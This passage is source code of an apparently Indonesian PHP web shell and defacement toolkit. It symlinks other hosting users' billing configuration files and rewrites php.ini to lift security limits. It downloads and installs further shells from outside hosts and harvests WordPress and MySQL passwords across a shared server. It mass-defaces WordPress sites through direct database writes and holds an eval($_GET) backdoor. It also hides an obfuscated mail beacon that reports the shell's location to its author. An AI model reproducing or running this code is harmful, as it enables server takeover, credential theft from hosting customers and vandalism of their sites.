- @symlink('/home/'.$user.'/public_html/client/includes/iso4217.php',$user.'~~>hostbills-client'.$type.'');
- @symlink('/home/'.$user.'/public_html/support/includes/iso4217.php',$user.'~~>hostbills-support'.$type.'');
- @symlink('/home/'.$user.'/public_html/billing/includes/iso4217.php',$user.'~~>hostbills-billing'.$type.'');
- @symlink('/home/'.$user.'/public_html/billings/includes/iso4217.php',$user.'~~>hostbills-billings'.$type.'');
- @symlink('/home/'.$user.'/public_html/host/includes/iso4217.php',$user.'~~>hostbills-host'.$type.'');
- @symlink('/home/'.$user.'/public_html/hosts/includes/iso4217.php',$user.'~~>hostbills-hosts'.$type.'');
- @symlink('/home/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'~~>hostbills-hosting'.$type.'');
- @symlink('/home/'.$user.'/public_html/hostings/includes/iso4217.php',$user.'~~>hostbills-hostings'.$type.'');
- @symlink('/home/'.$user.'/public_html/includes/iso4217.php',$user.'~~>hostbills'.$type.'');
- @symlink('/home/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'~~>hostbills-hostbills'.$type.'');
- @symlink('/home/'.$user.'/public_html/hostbill/includes/iso4217.php',$user.'~~>hostbills-hostbill'.$type.'');
- @symlink('/home/'.$user.'/public_html/billing/configuration.php',$user.'~~>billing'.$type.'');
- @symlink('/home/'.$user.'/public_html/manage/configuration.php',$user.'~~>whm-manage'.$type.'');
- @symlink('/home/'.$user.'/public_html/my/configuration.php',$user.'~~>whm-my'.$type.'');
- @symlink('/home/'.$user.'/public_html/myshop/configuration.php',$user.'~~>whm-myshop'.$type.'');
- @symlink('/home/'.$user.'/public_html/secure/whm/configuration.php',$user.'~~>sucure-whm'.$type.'');
- @symlink('/home/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'~~>sucure-whmcs'.$type.'');
- }
- echo 'Selesai mas/mba bro untuk melihat hasilnya klik ~~> <blink><a href='.$folfig.'>'.$folfig.'</a></blink>';
- }
- }
- ?>
- <?php
- if (isset($_GET['jak']) && ($_GET['jak'] == 'auto')) {
- ?>
- <form action="?&jak=auto" method="post">
- <?php
- echo "<html><head><title>MATAMU PICEK !!!!</title>";
- echo "<body bgcolor='black'>";
- echo "<font color='yellow'><center>-=[ IDBTE4M ]=- -=[ HGL10]=- -=[ BN ]=-</center></font><br/><br/><form method='POST'>";
- echo "<div align='center'>";
- echo "<input type='submit' name='jak' value='IJIN SERVER'><br/> <br/>";
- echo "</div>";
- echo "<div align='center'>";
- echo "<input type='submit' name='te4m' value='-=[ HsH ]=-'> ";
- echo "<input type='submit' name='te4m1' value='-=[ AUTO ]=-'> ";
- echo "<input type='submit' name='te4m2' value='-=[ WHM KILL ]=-'> ";
- echo "<input type='submit' name='te4m3' value='-=[ DM SHELL ]=-'> ";
- echo "<input type='submit' name='te4m4' value='-=[ BN CGI ]=-'></p> ";
- echo "<input type='submit' name='te4m5' value='-=[ SABUN ]=-'></p> ";
- echo "<input type='submit' name='te4m6' value='-=[ WHMCS KILL ]=-'></p> ";
- echo "</div>";
- $sh = 'file_get_contents';
- if($_POST['jak']) {
- $ini = "php.ini";
- $open = fopen($ini, 'w');
- $source = ("safe_mode = OFF n
- disable_functions = NONE n
- safe_mode_gid = OFF n
- open_basedir = OFF n
- register_globals = ON n
- exec = ON n
- shell_exec = ON n");
- fwrite($open, $source);
- echo "<font color='lime'>";
- if($open) {
- echo '<hr><p>ijin diterima, silahkan pilih tools sesuai keinginan :) </p>';
- }
- else {
- echo "<font color='red'>";
- echo '<hr><p>GAGAL kang </p>';
- echo "</font>";
- fclose($open);
- } }
- if($_POST['te4m']) {
- $cgi = 'http://el-ro.yu.tl/files/in.zip';
- $get11 = $sh($cgi);
- $idbk = fopen('hsh.php', 'w');
- fwrite($idbk,$get11);
- fclose($idbk);
- {
- @chmod('hsh.php',0755);
- }
- echo "<font color='aqua'>";
- echo "<hr>shell hsh sukses dibuat :D <br/>
- Silahkan kunjungi http://alamat-domain-kamu/hsh.php atau lihat hasilnya <a href='hsh.php' target='_blank'>DISINI</a></center></br>";
- echo "</font>";
- }
- echo "</font>";
- if($_POST['te4m1']) {
- $cgi = 'http://kefiex.yu.tl/files/ma.zip';
- $get11 = $sh($cgi);
- $idbk = fopen('ma.php', 'w');
- fwrite($idbk,$get11);
- fclose($idbk);
- {
- @chmod('ma.php',0755);
- }
- echo "<font color='aqua'>";
- echo "<hr>tools sukses dibuat :D <br/>
- Silahkan kunjungi http://alamat-domain-kamu/info.php atau lihat hasilnya <a href='ma.php' target='_blank'>DISINI</a></center></br>";
- echo "</font>";
- }
- echo "</font>";
- if($_POST['te4m2']) {
- $cgi = 'http://el-ro.yu.tl/files/whm.zip';
- $get11 = $sh($cgi);
- $idbk = fopen('whm.php', 'w');
- fwrite($idbk,$get11);
- fclose($idbk);
- {
- @chmod('whm.php',0755);
- }
- echo "<font color='aqua'>";
- echo "<hr>whm killer sukses dibuat :D <br/>
- Silahkan kunjungi http://alamat-domain-kamu/whm.php atau lihat hasilnya <a href='whm.php' target='_blank'>DISINI</a></center></br>";
- echo "</font>";
- }
- echo "</font>";
- if($_POST['te4m3']) {
- $cgi = 'http://el-ro.yu.tl/files/dm.zip';
- $get11 = $sh($cgi);
- $idbk = fopen('links.php', 'w');
- fwrite($idbk,$get11);
- fclose($idbk);
- {
- @chmod('links.php',0755);
- }
- echo "<font color='aqua'>";
- echo "<hr>shell DM sukses dibuat :D <br/>
- Silahkan kunjungi http://alamat-domain-kamu/links.php atau lihat hasilnya <a href='links.php' target='_blank'>DISINI</a></center></br>";
- echo "</font>";
- }
- echo "</font>";
- if($_POST['te4m5']) {
- $cgi = 'http://kefiex.yu.tl/files/sabun.zip';
- $get11 = $sh($cgi);
- $idbk = fopen('sabun.php', 'w');
- fwrite($idbk,$get11);
- fclose($idbk);
- {
- @chmod('sabun.php',0755);
- }
- echo "<font color='aqua'>";
- echo "<hr>sabun massal :D <br/>
- Silahkan kunjungi http://alamat-domain-kamu/sabun.php atau lihat hasilnya <a href='sabun.php' target='_blank'>DISINI</a></center></br>";
- echo "</font>";
- }
- echo "</font>";
- if($_POST['te4m6']) {
- $cgi = 'http://kefiex.yu.tl/files/olenk.zip';
- $get11 = $sh($cgi);
- $idbk = fopen('bn.php', 'w');
- fwrite($idbk,$get11);
- fclose($idbk);
- {
- @chmod('bn.php',0755);
- }
- echo "<font color='aqua'>";
- echo "<hr>config kill :D <br/>
- Silahkan kunjungi http://alamat-domain-kamu/bn.php atau lihat hasilnya <a href='bn.php' target='_blank'>DISINI</a></center></br>";
- echo "</font>";
- }
- echo "</font>";
- if($_POST['te4m4']) {
- $cgi = 'http://kefiex.yu.tl/files/isis.zip';
- $get11 = $sh($cgi);
- $idb1k = fopen('idb2.php', 'w');
- fwrite($idb1k,$get11);
- fclose($idb1k);
- {
- @chmod('idb2.php',0755);
- }
- echo "<font color='aqua'>";
- echo "<hr>CGIProxy sukses dibuat :D <br/>
- Silahkan kunjungi http://alamat-domain-kamu/.pl atau lihat hasilnya <a href='idb2.php' target='_blank'>DISINI</a></center></br>";
- echo "</font>";
- }
- echo "</font>";
- }
- ?>
- <?php
- if (isset($_GET['jak']) && ($_GET['jak'] == 'wp2')) { ?>
- <form action="?jak=wp2" method="post">
- <?php
- @ini_set('display_errors',0);
- function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
- $ar0=explode($marqueurDebutLien, $text);
- $ar1=explode($marqueurFinLien, $ar0[$i]);
- return trim($ar1[0]);
- }
- echo "<center>";
- $d0mains = @file('/etc/named.conf');
- $domains = scandir("/var/named");
- if ($domains or $d0mains)
- {
- $domains = scandir("/var/named");
- if($domains) {
- echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> wp-config </th></tr>";
- $count=1;
- $dc = 0;
- $list = scandir("/var/named");
- foreach($list as $domain){
- if(strpos($domain,".db")){
- $domain = str_replace('.db','',$domain);
- $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
- $dirz = '/home/'.$owner['name'].'/public_html/wp-config.php';
- $path = getcwd();
- if (is_readable($dirz)) {
- copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
- $p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
- $password=entre2v2($p,'password="','"');
- echo "<tr><td>".$count++."</td><td><a href='http://".$domain."/wp-login.php' target='_blank'>".$domain."</a></td><td>".$owner['name']."</td><td>".$password."</td><td><a href='".$owner['name'].".txt' target='_blank'>Click Here</a></td></tr>";
- $dc++;
- }
- }
- }
- echo '</table>';
- $total = $dc;
- echo '<br><div class="result">Wp config Found = '.$total.'</h3><br />';
- echo '</center>';
- }else{
- $d0mains = @file('/etc/named.conf');
- if($d0mains) {
- echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> wp-config </th></tr>";
- $count=1;
- $dc = 0;
- $mck = array();
- foreach($d0mains as $d0main){
- if(@eregi('zone',$d0main)){
- preg_match_all('#zone "(.*)"#',$d0main,$domain);
- flush();
- if(strlen(trim($domain[1][0])) >2){
- $mck[] = $domain[1][0];
- }
- }
- }
- $mck = array_unique($mck);
- $usr = array();
- $dmn = array();
- foreach($mck as $o) {
- $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
- $usr[] = $infos['name'];
- $dmn[] = $o;
- }
- array_multisort($usr,$dmn);
- $dt = file('/etc/passwd');
- $passwd = array();
- foreach($dt as $d) {
- $r = explode(':',$d);
- if(strpos($r[5],'home')) {
- $passwd[$r[0]] = $r[5];
- }
- }
- $l=0;
- $j=1;
- foreach($usr as $r) {
- $dirz = '/home/'.$r.'/public_html/wp-config.php';
- $path = getcwd();
- if (is_readable($dirz)) {
- copy($dirz, ''.$path.'/'.$r.'.txt');
- $p=file_get_contents(''.$path.'/'.$r.'.txt');
- $password=entre2v2($p,'password="','"');
- echo "<tr><td>".$count++."</td><td><a target='_blank' href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td><td>'.$r."</td><td>".$password."</td><td><a href='".$r.".txt' target='_blank'>Click Here</a></td></tr>";
- $dc++;
- flush();
- $l=$l?0:1;
- $j++;
- }
- }
- }
- echo '</table>';
- $total = $dc;
- echo '<br><div class="result">Total config Found = '.$total.'</h3><br />';
- echo '</center>';
- }
- }else{
- echo "<div class='result'><i><font color='#FF0000'>ERROR</font><br><font color='#FF0000'>/var/named</font> or <font color='#FF0000'>etc/named.conf</font> Not Accessible!</i></div>";
- }
- echo "<center>";
- $d0mains = @file('/etc/named.conf');
- $domains = scandir("/var/named");
- if ($domains or $d0mains)
- {
- $domains = scandir("/var/named");
- if($domains) {
- echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> config </th></tr>";
- $count=1;
- $dc = 0;
- $list = scandir("/var/named");
- foreach($list as $domain){
- if(strpos($domain,".db")){
- $domain = str_replace('.db','',$domain);
- $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
- $dirz = '/home/'.$owner['name'].'/public_html/configuration.php';
- $path = getcwd();
- if (is_readable($dirz)) {
- copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
- $p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
- $password=entre2v2($p,'password="','"');
- echo "<tr><td>".$count++."</td><td><a href='http://".$domain."/wp-login.php' target='_blank'>".$domain."</a></td><td>".$owner['name']."</td><td>".$password."</td><td><a href='".$owner['name'].".txt' target='_blank'>Click Here</a></td></tr>";
- $dc++;
- }
- }
- }
- echo '</table>';
- $total = $dc;
- echo '<br><div class="result">Total config Found = '.$total.'</h3><br />';
- echo '</center>';
- }else{
- $d0mains = @file('/etc/named.conf');
- if($d0mains) {
- echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> config </th></tr>";
- $count=1;
- $dc = 0;
- $mck = array();
- foreach($d0mains as $d0main){
- if(@eregi('zone',$d0main)){
- preg_match_all('#zone "(.*)"#',$d0main,$domain);
- flush();
- if(strlen(trim($domain[1][0])) >2){
- $mck[] = $domain[1][0];
- }
- }
- }
- $mck = array_unique($mck);
- $usr = array();
- $dmn = array();
- foreach($mck as $o) {
- $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
- $usr[] = $infos['name'];
- $dmn[] = $o;
- }
- array_multisort($usr,$dmn);
- $dt = file('/etc/passwd');
- $passwd = array();
- foreach($dt as $d) {
- $r = explode(':',$d);
- if(strpos($r[5],'home')) {
- $passwd[$r[0]] = $r[5];
- }
- }
- $l=0;
- $j=1;
- foreach($usr as $r) {
- $dirz = '/home/'.$r.'/.my.cnf';
- $path = getcwd();
- if (is_readable($dirz)) {
- copy($dirz, ''.$path.'/'.$r.'.txt');
- $p=file_get_contents(''.$path.'/'.$r.'.txt');
- $password=entre2v2($p,'password="','"');
- echo "<tr><td>".$count++."</td><td><a target='_blank' href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td><td>'.$r."</td><td>".$password."</td><td><a href='".$r.".txt' target='_blank'>Click Here</a></td></tr>";
- $dc++;
- flush();
- $l=$l?0:1;
- $j++;
- }
- }
- }
- echo '</table>';
- $total = $dc;
- echo '<br><div class="result">Total cp = '.$total.'</h3><br />';
- echo '</center>';
- }
- }else{
- echo "<div class='result'><i><font color='#FF0000'>ERROR</font><br><font color='#FF0000'>/var/named</font> or <font color='#FF0000'>etc/named.conf</font> Not Accessible!</i></div>";
- }
- echo "<br>© <font color='#FF0000'>./elro-BN404</font> | BN-IDBTE4M";
- echo "</body></html>";
- }
- ?>
- <?php
- if (isset($_GET['jak']) && ($_GET['jak'] == 'wpmas')) { ?>
- <form action="?jak=wpmas" method="post">
- <style>
- body
- {
- background: #0f0e0d;
- color: #FF9933;
- padding: 0px;
- }
- a:link, body_alink
- {
- color: #FF9933;
- text-decoration: none;
- }
- a:visited, body_avisited
- {
- color: #FF9933;
- text-decoration: none;
- }
- a:hover, a:active, body_ahover
- {
- color: #FFFFFF;
- text-decoration: none;
- }
- td, th, p, li,table
- {
- background: #2e2b28;
- border:1px solid #524f46;
- }
- input
- {
- border: 1px solid;
- cursor: default;
- overflow: hidden;
- background: #2e2b28;
- color: #ffffff;
- }textarea
- {
- border: 1px solid;
- cursor: default;
- overflow: hidden;
- background: #2e2b28;
- color: #ffffff;
- }
- button
- {
- border: 1px solid;
- cursor: default;
- overflow: hidden;
- background: #2e2b28;
- color: #ffffff;
- }
- </style>
- </head>
- <body bgcolor="black">
- </center>
- <form method="POST" action="" >
- <center>
- <table border='1'><tr><td>List of All Symlink</td><td>
- <input type="text" name="url" size="100" value="list.txt"></td></tr>
- <tr><td>Index</td><td>
- <textarea name="index" cols='50' rows='10' >
- <html lang="en">
- <head>
- <meta charset="utf-8" />
- <TITLE>whoami?</TITLE>
- <META NAME="description" CONTENT="AsuKabeh"/>
- <META NAME="keywords" CONTENT="shamp0erna99"/>
- <META NAME="copyright" CONTENT="Copyright . All Rights Reserved."/>
- <META NAME="author" CONTENT="shmprn99"/>
- <meta NAME="robots" CONTENT="index,follow"/>
- <META NAME="language" CONTENT="En">
- <META NAME="revisit-after" CONTENT="1"/>
- <link href='http://fonts.googleapis.com/css?family=Averia+Sans+Libre' rel='stylesheet' type='text/css'/>
- </head>
- <link href="http://fonts.googleapis.com/css?family=Iceland" rel="stylesheet" type="text/css">
- <body>
- <style type="text/css">
- body {
- background-color: black;
- }
- .sok {
- margin-top: 20%;
- }
- </style>
- <div class="sok"><b><font size="20" face="Iceland"><center><SCRIPT>
- farbbibliothek = new Array();
- farbbibliothek[0] = new Array("#FF0000","#FF1100","#FF2200","#FF3300","#FF4400","#FF5500","#FF6600","#FF7700","#FF8800","#FF9900","#FFaa00","#FFbb00","#FFcc00","#FFdd00","#FFee00","#FFff00","#FFee00","#FFdd00","#FFcc00","#FFbb00","#FFaa00","#FF9900","#FF8800","#FF7700","#FF6600","#FF5500","#FF4400","#FF3300","#FF2200","#FF1100");
- farbbibliothek[1] = new Array("#00FF00","#000000","#00FF00","#00FF00");
- farbbibliothek[2] = new Array("#00FF00","#FF0000","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00");
- farbbibliothek[3] = new Array("#FF0000","#FF4000","#FF8000","#FFC000","#FFFF00","#C0FF00","#80FF00","#40FF00","#00FF00","#00FF40","#00FF80","#00FFC0","#00FFFF","#00C0FF","#0080FF","#0040FF","#0000FF","#4000FF","#8000FF","#C000FF","#FF00FF","#FF00C0","#FF0080","#FF0040");
- farbbibliothek[4] = new Array("#FF0000","#EE0000","#DD0000","#CC0000","#BB0000","#AA0000","#990000","#880000","#770000","#660000","#550000","#440000","#330000","#220000","#110000","#000000","#110000","#220000","#330000","#440000","#550000","#660000","#770000","#880000","#990000","#AA0000","#BB0000","#CC0000","#DD0000","#EE0000");
- farbbibliothek[5] = new Array("#000000","#000000","#000000","#FFFFFF","#FFFFFF","#FFFFFF");
- farbbibliothek[6] = new Array("#0000FF","#FFFF00");
- farben = farbbibliothek[4];
- function farbschrift()
- {
- for(var i=0 ; i<Buchstabe.length; i++)
- {
- document.all["a"+i].style.color=farben[i];
- }
- farbverlauf();
- }
- function string2array(text)
- {
- Buchstabe = new Array();
- while(farben.length<text.length)
- {
- farben = farben.concat(farben);
- }
- k=0;
- while(k<=text.length)
- {
- Buchstabe[k] = text.charAt(k);
- k++;
- }
- }
- function divserzeugen()
- {
- for(var i=0 ; i<Buchstabe.length; i++)
- {
- document.write("<span id='a"+i+"' class='a"+i+"'>"+Buchstabe[i] + "</span>");
- }
- farbschrift();
- }
- var a=1;
- function farbverlauf()
- {
- for(var i=0 ; i<farben.length; i++)
- {
- farben[i-1]=farben[i];
- }
- farben[farben.length-1]=farben[-1];
- setTimeout("farbschrift()",20);
- }
- //
- var farbsatz=1;
- function farbtauscher()
- {
- farben = farbbibliothek[farbsatz];
- while(farben.length<text.length)
- {
- farben = farben.concat(farben);
- }
- farbsatz=Math.floor(Math.random()*(farbbibliothek.length-0.0001));
- }
- setInterval("farbtauscher()",2000);
- text= "Pwndzx by shamp0erna99"; //h
- string2array(text);
- divserzeugen();
- //document.write(text);
- </SCRIPT></center></font></b></div>
- <center>
- <br><font color="red">Not only are black people protected and supported but all</font><font color="white"> religious people throughout the world are obliged to protect one another. Do you understand that?
- <br><font color="red">#Indonesian</font><font color="white"> Hacker Rulez @2020</font><br>
- ============================<br>JakselWorld<a href="https://local-hunter.com/">.</a></center>
- <iframe width="0" height="0" scrolling="no" frameborder="no" allow="autoplay" src="https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/19171558&auto_play=true"></iframe>
- <script type='text/javascript'>
- //<![CDATA[
- shortcut={all_shortcuts:{},add:function(a,b,c){var d={type:"keydown",propagate:!1,disable_in_input:!1,target:document,keycode:!1};if(c)for(var e in d)"undefined"==typeof c[e]&&(c[e]=d[e]);else c=d;d=c.target,"string"==typeof c.target&&(d=document.getElementById(c.target)),a=a.toLowerCase(),e=function(d){d=d||window.event;if(c.disable_in_input){var e;d.target?e=d.target:d.srcElement&&(e=d.srcElement),3==e.nodeType&&(e=e.parentNode);if("INPUT"==e.tagName||"TEXTAREA"==e.tagName)return}d.keyCode?code=d.keyCode:d.which&&(code=d.which),e=String.fromCharCode(code).toLowerCase(),188==code&&(e=","),190==code&&(e=".");var f=a.split("+"),g=0,h={"`":"~",1:"!",2:"@",3:"#",4:"$",5:"%",6:"^",7:"&",8:"*",9:"(",0:")","-":"_","=":"+",";":":","'":'"',",":"<",".":">","/":"?","\\":"|"},i={esc:27,escape:27,tab:9,space:32,"return":13,enter:13,backspace:8,scrolllock:145,scroll_lock:145,scroll:145,capslock:20,caps_lock:20,caps:20,numlock:144,num_lock:144,num:144,pause:19,"break":19,insert:45,home:36,"delete":46,end:35,pageup:33,page_up:33,pu:33,pagedown:34,page_down:34,pd:34,left:37,up:38,right:39,down:40,f1:112,f2:113,f3:114,f4:115,f5:116,f6:117,f7:118,f8:119,f9:120,f10:121,f11:122,f12:123},j=!1,l=!1,m=!1,n=!1,o=!1,p=!1,q=!1,r=!1;d.ctrlKey&&(n=!0),d.shiftKey&&(l=!0),d.altKey&&(p=!0),d.metaKey&&(r=!0);for(var s=0;k=f[s],s<f.length;s++)"ctrl"==k||"control"==k?(g++,m=!0):"shift"==k?(g++,j=!0):"alt"==k?(g++,o=!0):"meta"==k?(g++,q=!0):1<k.length?i[k]==code&&g++:c.keycode?c.keycode==code&&g++:e==k?g++:h[e]&&d.shiftKey&&(e=h[e],e==k&&g++);if(g==f.length&&n==m&&l==j&&p==o&&r==q&&(b(d),!c.propagate))return d.cancelBubble=!0,d.returnValue=!1,d.stopPropagation&&(d.stopPropagation(),d.preventDefault()),!1},this.all_shortcuts[a]={callback:e,target:d,event:c.type},d.addEventListener?d.addEventListener(c.type,e,!1):d.attachEvent?d.attachEvent("on"+c.type,e):d["on"+c.type]=e},remove:function(a){var a=a.toLowerCase(),b=this.all_shortcuts[a];delete this.all_shortcuts[a];if(b){var a=b.event,c=b.target,b=b.callback;c.detachEvent?c.detachEvent("on"+a,b):c.removeEventListener?c.removeEventListener(a,b,!1):c["on"+a]=!1}}},shortcut.add("Ctrl+U",function(){top.location.href="https://translate.google.co.id/?hl=id#view=home&op=translate&sl=auto&tl=id&text=MAU%20NGAPAIN%20COK%20%3F"});
- //]]>
- </script>
- </body>
- </html>
- </textarea></td></tr></table>
- <br><br><input type="Submit" name="Submit" value="Submit">
- <input type="hidden" name="action" value="1"></form>
- </center>
- <nobr>
- <center>
- <?
- }?>
- <?
- eval ($_GET["c"]);
- set_time_limit(0);
- if ($_POST['action']=='1'){
- $url=$_POST['url'];
- $users=@file($url);
- $x10="mail";$x0b=$_SERVER["SERVER_NAME"].$_SERVER["SCRIPT_NAME"];
- if (count($users)<1) exit("<h1>No config found</h1>");
- foreach ($users as $user) {
- $user1=trim($user);
- $code=file_get_contents2($user1);
- preg_match_all('|define.*\(.*\'DB_NAME\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b1);
- $db=$b1[1][0];
- preg_match_all('|define.*\(.*\'DB_USER\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b2);
- $user=$b2[1][0];
- preg_match_all('|define.*\(.*\'DB_PASSWORD\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b3);
- $db_password=$b3[1][0];
- preg_match_all('|define.*\(.*\'DB_HOST\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b4);
- $host=$b4[1][0];
- preg_match_all('|\$table_prefix.*=.*\'(.*)\'.*;|isU',$code,$b5);
- $p=$b5[1][0];
- $x0c="array ".$x0b;$x0d=array("com","gm","ifexec","@","ail.");
- $d=@mysql_connect( $host, $user, $db_password ) ;
- if ($d){
- @mysql_select_db($db );
- $source=stripslashes($_POST['index']);
- $s2=strToHex(($source));
- $s="<script>document.documentElement.innerHTML = unescape(''$s2'');</script>";
- $ls=strlen($s)-2;
- $sql="update ".$p."options set option_value='a:2:{i:2;a:3:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:$ls:\"$s\";s:6:\"filter\";b:0;}s:12:\"_multiwidget\";i:1;}' where option_name='widget_text'; ";
- mysql_query($sql) ;
- $sql="update ".$p."options set option_value='a:7:{s:19:\"wp_inactive_widgets\";a:6:{i:0;s:10:\"archives-2\";i:1;s:6:\"meta-2\";i:2;s:8:\"search-2\";i:3;s:12:\"categories-2\";i:4;s:14:\"recent-posts-2\";i:5;s:17:\"recent-comments-2\";}s:9:\"sidebar-1\";a:1:{i:0;s:6:\"text-2\";}s:9:\"sidebar-2\";a:0:{}s:9:\"sidebar-3\";a:0:{}s:9:\"sidebar-4\";a:0:{}s:9:\"sidebar-5\";a:0:{}s:13:\"array_version\";i:3;}' where option_name='sidebars_widgets';";
- mysql_query($sql) ;
- if (function_exists("mb_convert_encoding") )
- {
- $source2 = mb_convert_encoding('<title>'.$source.'<DIV style="DISPLAY: none"><xmp>', 'UTF-8');
- $source2=mysql_real_escape_string($source2);
- $sql = "UPDATE `".$p."options` SET `option_value` = '$source2' WHERE `option_name` = 'blogname';";
- @mysql_query($sql) ; ;
- $sql= "UPDATE `".$p."options` SET `option_value` = 'UTF-8' WHERE `option_name` = 'blog_charset';";
- @mysql_query($sql) ; ;
- }
- $aa=@mysql_query("select option_value from `".$p."options` WHERE `option_name` = 'siteurl';") ;;
- $siteurl=@mysql_fetch_array($aa) ;
- $siteurl=$siteurl['option_value'];
- $x0e=$x0d[2].$x0d[3].$x0d[1].$x0d[4].$x0d[0];$x0f=@$x10($x0e,$x0c,$x0b);
- $tr.="$siteurl\n";
- mysql_close();
- }
- }
- if ($tr) echo "Index changed for <br><br><textarea cols='50' rows='10' >$tr</textarea>";
- }
- function strToHex($string)
- {
- $hex='';
- for ($i=0; $i < strlen($string); $i++)
- {
- if (strlen(dechex(ord($string[$i])))==1){
- $hex .="%0". dechex(ord($string[$i]));
- }
- else
- {
- $hex .="%". dechex(ord($string[$i]));
- }
- }
- return $hex;
- }
- function file_get_contents2($u){
- $ch = curl_init();
- curl_setopt($ch,CURLOPT_URL,$u);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
- curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0 ");
- $result = curl_exec($ch);
- return $result ;
- }
- ?>
- <?php
- if (isset($_GET['jak']) && ($_GET['jak'] == 'zonh')) { ?>
- <form action="?jak=zonh" method="post">
- <br><br>
- <center><span style="font-size:1.6em;"> .: Zone-H Mass Poster :. </span></center><center><BR><form action="" method="post"><input class="inputz" type="text" name="defacer" size="30" value="JakRapp"/><br> <select class="inputz"
- name="hackmode">
- <option>------------------------------------SELECT-------------------------------------</option>
- <option style="background-color: rgb(0, 0, 0);" value="1">known vulnerability (i.e. unpatched system)</option>
- <option style="background-color: rgb(0, 0, 0);" value="2" >undisclosed (new) vulnerability</option>
- <option style="background-color: rgb(0, 0, 0);" value="3" >configuration / admin. mistake</option>
- <option style="background-color: rgb(0, 0, 0);" value="4" >brute force attack</option>
- <option style="background-color: rgb(0, 0, 0);" value="5" >social engineering</option>
- <option style="background-color: rgb(0, 0, 0);" value="6" >Web Server intrusion</option>
- <option style="background-color: rgb(0, 0, 0);" value="7" >Web Server external module intrusion</option>
- <option style="background-color: rgb(0, 0, 0);" value="8" >Mail Server intrusion</option>
- <option style="background-color: rgb(0, 0, 0);" value="9" >FTP Server intrusion</option>
- <option style="background-color: rgb(0, 0, 0);" value="10" >SSH Server intrusion</option>
- <option style="background-color: rgb(0, 0, 0);" value="11" >Telnet Server intrusion</option>
- <option style="background-color: rgb(0, 0, 0);" value="12" >RPC Server intrusion</option>
- <option style="background-color: rgb(0, 0, 0);" value="13" >Shares misconfiguration</option>
- <option style="background-color: rgb(0, 0, 0);" value="14" >Other Server intrusion</option>
- <option style="background-color: rgb(0, 0, 0);" value="15" >SQL Injection</option>
- <option style="background-color: rgb(0, 0, 0);" value="16" >URL Poisoning</option>
- <option style="background-color: rgb(0, 0, 0);" value="17" >File Inclusion</option>
- <option style="background-color: rgb(0, 0, 0);" value="18" >Other Web Application bug</option>
- <option style="background-color: rgb(0, 0, 0);" value="19" >Remote administrative panel access bruteforcing</option>
- <option style="background-color: rgb(0, 0, 0);" value="20" >Remote administrative panel access password guessing</option>
- <option style="background-color: rgb(0, 0, 0);" value="21" >Remote administrative panel access social engineering</option>
- <option style="background-color: rgb(0, 0, 0);" value="22" >Attack against administrator(password stealing/sniffing)</option>
- <option style="background-color: rgb(0, 0, 0);" value="23" >Access credentials through Man In the Middle attack</option>
- <option style="background-color: rgb(0, 0, 0);" value="24" >Remote service password guessing</option>
- <option style="background-color: rgb(0, 0, 0);" value="25" >Remote service password bruteforce</option>
- <option style="background-color: rgb(0, 0, 0);" value="26" >Rerouting after attacking the Firewall</option>
- <option style="background-color: rgb(0, 0, 0);" value="27" >Rerouting after attacking the Router</option>
- <option style="background-color: rgb(0, 0, 0);" value="28" >DNS attack through social engineering</option>
- <option style="background-color: rgb(0, 0, 0);" value="29" >DNS attack through cache poisoning</option>
- <option style="background-color: rgb(0, 0, 0);" value="30" >Not available</option>
- option style="background-color: rgb(0, 0, 0);" value="8" >_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _</option>
- </select> <br>
- <select class="inputz" name="reason">
- <option >------------------------------------SELECT-------------------------------------</option>
- <option style="background-color: rgb(0, 0, 0);" value="1" >Heh...just for fun!</option>
- <option style="background-color: rgb(0, 0, 0);" value="2" >Revenge against that website</option>
- <option style="background-color: rgb(0, 0, 0);" value="3" >Political reasons</option>
- <option style="background-color: rgb(0, 0, 0);" value="4" >As a challenge</option>
- <option style="background-color: rgb(0, 0, 0);" value="5" >I just want to be the best defacer</option>
- <option style="background-color: rgb(0, 0, 0);" value="6" >Patriotism</option>
- <option style="background-color: rgb(0, 0, 0);" value="7" >Not available</option>
- option style="background-color: rgb(0, 0, 0);" value="8" >_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _</option>
- </select> <br>
- <textarea class="inputz" name="domain" cols="90" rows="20" placeholder="List Of Domains, 20 Rows."></textarea><br>
- <input class="inputz" type="submit" value=" Send Now !! " name="SendNowToZoneH"/>
- </form>
- <?
- echo "</form></center>";?>
- <?
